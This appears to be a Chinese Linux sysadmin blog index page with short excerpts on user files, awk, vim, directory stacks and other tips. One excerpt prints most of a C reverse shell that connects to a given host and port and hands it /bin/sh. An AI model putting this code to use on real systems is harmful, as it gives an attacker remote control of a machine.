linux用户和组管理

Linux用户配置文件 用户管理主要通过修改用户配置文件完成,用户管理控制工具最终目的也是为了修改用户配置文件,那就让我们一起来认识一下Linux用户账户的配置文件. 1.用户信息文件/etc/passwd /etc /passwd是系统识别用户的一个文件,系统所有的用户在这里都有记载。假设当……

Continue reading

在word框里打勾

一、先输入一个勾(√),然后选择它,格式-中文版式-带圈字符。基本实现了效果,不过咋看咋别扭,整出来的东西有些变形。下下策也。 二、插入-符号,字体wingdings 字符代码254。(之后可以设置快捷键) 该方法设置出来的才是正宗的方框中打勾。……

Continue reading

awk中RS,ORS,FS,OFS这个参数的用法

一,RS与ORS 1,RS是记录分隔符,默认的分隔符是n,具体用法看下 1[root@localhost test]# cat test1 //测试文件 2 111 222 3 333 444 4 555 666 2, RS默认分割符n 1[root@localhost test]# awk '{print $0}' test1 //awk 'BEGIN{RS="n"}{print $0}' test1 这二个是一样的 2111 222 3333 444 4555 666 其实你可以把上面test1文件里的内容理解为,111 222n333 444n555 6666,利用n进行分割。看下一个例子 3, 自定义RS……

Continue reading

方便的目录切换——dirs、pushd、popd命令

&nbsp;<br /> 一、目录栈指令 目录栈是用户最近访问过的系统目录列表,并以堆栈的形式管理。栈中的内容与Shell环境变量DIRSTACK的值对应 1、dirs 1)功能<br /> 显示当前目录栈中的所有记录(不带参数的dirs命令显示当前目录栈中的记录) 2)语法<br /> (1)格式:dirs……

Continue reading

linux下增加对ntfs和fat32文件格式的支持

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 在一个老的linux发行版本中,默认是不支持windows格式的。当时如果想要支持经常使用的方法有两个: 一是:重新编绎内核,选择windows分区格式的支持。这个方法很麻烦。 二是:通过第三方包来增加对windows分区的支持。 &nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 我们平时经常用到的是第二种方法: centos给我……

Continue reading

vim增加缩进量

在Normal Mode下,命令>>将对当前行增加缩进,而命令<<则将对当前行减少缩进。我们可以在命令前使用数字,来指定命令作用的范围。例如以下命令,将减少5行的缩进: 5<< 在Insert/Replace Mode下,Ctrl-Shift-t可以增加当前行的缩进,……

Continue reading

linux下有用的小技巧

<strong>1、shell下将输出为pdf文件</strong><br /> man -t manpage | ps2pdf – filename.pdf 比如制作 ls 命令的 man 手册 pdf 文件 man -t ls | ps2pdf – ls.pdf <strong>2、bind为命令绑定快捷键</strong><br /> bind -x ‘”C-l”:……

Continue reading

linux下C语言版反向shell

代码如下: 1#include <stdio.h> 2#include <sys/types.h> 3#include <sys/socket.h> 4#include <unistd.h> 5#include <fcntl.h> 6#include <netinet/in.h> 7#include <stdio.h> 8#include <sys/types.h> 9#include <sys/socket.h> 10#include <unistd.h> 11#include <fcntl.h> 12#include <netinet/in.h> 13#include <netdb.h> 14 15void usage(); 16char shell[]="/bin/sh"; 17char message[]="hacker welcomen"; 18int sock; 19int main(int argc, char *argv[]) { 20 if(argc <3){ 21 usage(argv[0]); 22 } 23 24 struct sockaddr_in server; 25 if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) { 26 printf("Couldn't make socket!n"); exit(-1); 27 } 28 29 server.sin_family = AF_INET; 30 server.sin_port = htons(atoi(argv[2])); 31 server.sin_addr.s_addr = inet_addr(argv[1]); 32 33 if(connect(sock, (struct sockaddr *)&server, sizeof(struct sockaddr)) == -1) { 34 printf("Could not connect to remote shell!n"); 35 exit(-1); 36 } 37 send(sock, message, sizeof(message), 0); 38 dup2(sock, 0); 39 dup2(sock, 1); 40 dup2(sock, 2); 41 execl(shell,"/bin/sh",(char *)0); 42 close(sock); 43 return 1; 44} 45 46void usage(char *prog[]) { 47 printf("Usage:……

Continue reading

Latest articles

Categories

Tags

ACL AD AES AI Alpine Android Anpic Ansible Apache Apm Apparmor Appfog Apr Apt-Get Aria2 Array Atlassian Atop Audit Awk AWS Awstats Axel Azure Backdoor Backup Bamboo Bash Bat Benchmark Bigdata Bin Bind Bitwise Blockchain BMC Book Bootstrap Brocade Bsd C1000 Cache Capistrano Catlog CDH5 Centos Centos7 Chatops Chattr Check_mk Checkinstall Cisco CL210 Clickhouse Cloud Cloud-Desktop Cmdb Cms Cobbler Collectd Comm Compress Confd Conver Corosync Cpu Crontab Crunchbang Css Curl C语言 Date DDOS Decode Dell Desktop Devops Df Dhcp Diff Diskpart DISTINCT Django DNS Docker Dos2unix Dpkg Drupal Duckdb EKS ELK Etcd Excel Fail2ban Fastcgi Fdisk Fiddler Find Firewalld Flask Flvtool Ftp Function Fuser GCP Geek Ghost Gin Git Github Gitlab Glances Glusterfs Go Godaddy Golang Google Gooupadd Grafana Graphviz Gravatra Grep Grub2 Hadoop Haproxy Hardware HBA HCIE Heartbeat Helm Hexdump Hhvm History Hotspot Html Http/Html/Web Http/Html/Web Httplogs Https HttpWatch Huawei Huaweicloud Hugo IBM Icmp Iconv Ifconfig IIS InfluxDB Ingress InnoDB Inotify Iopp IOS Ipmitool Iptables Iredmail Iscsi Isito It-News Java JavaScript Jdk Jenkins Jinja2 Jira Join Joomla K3s K8s Kdump Keepalived Kernel Kingate KVM Lamp Last Leetcode Lib Linux Linux高级篇 Ln Ls Lsi Lsof Lvm Lvs Mac Mail Man Mark Markdown Matplotlib Maven Memcached Microservice Mimikatz Mkdocs Mkpasswd Mmonit Mod_jk Mongodb Monit Monitor Mono Moodle Mosh Mount Mplayer Mpm Mrtg Mtr My.cnf Mysql Mysqlbinlog Mysqld_multi MySQLdb Mysqldump Mysqlhotcopy Nagios Nc Nethogs Netlify Nexus Nfs Nginx Nmon Nocatlog Node.js Nrpe Ntfs Ntop Ntp Obs Ocr Open-Falcon Openbox Opencv Openldap OpenResty Openssl Openstack Oracle Oswatch Paas Pacemaker Pam Pandas Parted Pcp Pcre Pdf Percona Perl Pexpect Pgrep Php Php-Fpm Ping Plsql Develope PM Postfix PostgreSQL Powershell Prettify Proc Prometheus Puppeteer Pushd Pwgen Pxe Pyecharts Python Python模块 QoS Radmin Raid Rdesktop Read Redhat Redis Redmine Regex Rh134 RH318 RH442 RHCA RHCE Rhel7 Rhel8 RHEV Rm Rman Rootkit Route Rpm Rpmforge Rrdtool RSA Rsync Rsyslog Safe Saltstack Samba Scapy Screen SecureCRT Sed Selenium Selinux Seo Seq Session Set Shc Sheepdog Shell Shopt Sitemap Skydns Smokeping Snffier Snmp Socket Soft Sort Spider Sql Sqlserver Squid SRE Ss Ssh Sshpass Statuscode Strace Strings Su SublimeText2 Sudo Suse Svn Sysbench Syslog-Ng Sysstat Systemd T Tar TC Tcpcopy Tcpdump Tech Telecom Telnet Tencentcloud Tengine Test Testlink Threads Time Tmux Tomcat Touch Tr Tsar Twisted Ubuntu Udev Ulimit Unix Unixbench User-Agent Useradd Varnish VBA Vbs Vercel Vi Vim Visudo Vmstat Vmware Vnc Voice Vpn Vscode Vsftp Vsftpd Vue Watchdog Web Webcam Webistrano Wget Wiki Windows Wol Wordpress Workshop Wsl X-Windows Xampp Xcache Xmllint Xtrabackup Yule Yum Zabbix Zeromq Zip Zonetime Zookeeper 下载工具 云主机 云原生 代理 加密 古意 吐槽 圈里圈外 娱乐 字符串函数 安全 平台架构 推理 提权 故事汇 故障案例 数据结构 每日看点 民国史 生活 科学记录 站长管理工具 算法 管理 网站架构 翻墙 股票 行业 诗韵 负载均衡 远程管理 面试题

Links

Meta